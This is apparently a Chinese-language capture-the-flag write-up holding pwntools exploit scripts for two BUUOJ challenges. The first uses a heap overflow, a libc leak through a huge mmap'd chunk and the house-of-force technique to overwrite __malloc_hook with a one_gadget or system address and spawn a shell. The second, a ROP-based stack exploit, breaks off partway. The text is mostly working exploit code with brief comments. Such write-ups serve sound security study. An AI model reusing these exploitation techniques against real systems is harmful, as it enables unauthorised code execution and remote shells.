64位libc2.23 house of force 这里不管申请多大的堆,都会读入0x50大小,所以这里是一个堆溢出,可以借此修改topchunk的大小 这里有一个很重要的关于泄露libc的知识: 申请一个极大的chunk,程序就会调用mmap进行内存分配,分配下的地址是libc 的跟随地址 所以这里我们可以先申请一个0x100000的chunk 来泄露libc 的基址 随后修改topchunk,利用house of force 进行攻击修改malloc hook来getshell
from pwn import * context.log_level='debug' context.arch = 'amd64' #p=process('./gyctf_2020_force') p=remote('node3.buuoj.cn',25871) elf=ELF('./gyctf_2020_force') libc=ELF('./libc-2.23_64.so') defadd(size,data): p.recvuntil('2:puts') p.sendline('1') p.recvuntil('size') p.sendline(str(size)) p.recvuntil('bin addr ') heap_addr=int(p.recv(14),16) p.recvuntil('content') p.send(data) return heap_addr ''' #this can be use in local not remote libc_heap=add(0x100000,'aa') libc_base=libc_heap-0x4d2010 ''' #this can use both remote and local libc_heap=add(0x200000,'aaaa') libc_base=libc_heap+0x200ff0 print(hex(libc_base)) #gdb.attach(p) #pause() #0x4d2010=0x7f8cda933010-(0x7f8cda825b10-0x3c4b10) malloc_hook=libc_base+0x3c4b10 realloc_hook=malloc_hook-0x8 realloc=libc_base+0x846c0 one_gadget=libc_base+0x4526a bin_sh=libc_base+0x18cd57 system=libc_base+0X45390 #onegadget is no use here because none of them is empty #gdb.attach(p) #pause() payload=p64(0)*5+p64(0xffffffffffffffff) heap_base=add(0x20,payload)-0x10#0x030 print(hex(heap_base))
#here use one_gadget this can success in local and remote# 使用one_gadget size=malloc_hook-heap_base-0x50-0x10#注意这里对齐-0x10而不是0x8,否则就会失败写不进去 add(size,'aa') add(0x20,'a'*8+p64(one_gadget)+p64(realloc+16)) #gdb.attach(p) #pause() p.recvuntil('2:puts') p.sendline('1') p.recvuntil('size') p.sendline('12') p.interactive() ''' #use malloc hook->system this can success in local and remote# 使用system size=malloc_hook-heap_base-0x50 add(size,'aa') add(0x20,p64(system)) p.recvuntil('2:puts') p.sendline('1') p.recvuntil('size') p.sendline(str(bin_sh)) #here is str not p64 p.interactive() '''
# -*- coding: utf-8 -*- from pwn import * context.log_level='debug' context.arch = 'i386' #p=process('./gyctf_2020_bfnote') p=remote('node3.buuoj.cn',28253) elf=ELF('./gyctf_2020_bfnote') read_got=elf.got['read'] read_plt=elf.plt['read'] fprintf_plt=elf.plt['fprintf'] fprintf_got=elf.got['fprintf'] atol_got=elf.got['atol'] libc_start=elf.plt['__libc_start_main'] leave_ret=0x08048578 stdout=0x804A044 postscript=0x804a060 main=0x8048761 _s=0x8048B5a #_IO_printf 00049670 #_IO_fprintf 00049650 #read 5b00 #write 5b70 print(hex(read_got)) print(hex(fprintf_got)) print(hex(fprintf_plt)) pop_4=0x080489d8 #0x080489d8 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret pop_3=0x080489d9 #0x080489d9 : pop esi ; pop edi ; pop ebp ; ret pop_2=0x080489da #0x080489da : pop edi ; pop ebp ; ret p.recvuntil('Give your description : ') payload='a'*0x32+'bbbb'+p32(0)+p32(postscript+0x400+4) p.sendline(payload) p.recvuntil('Give your postscript : ') pop_ebx=0x08048441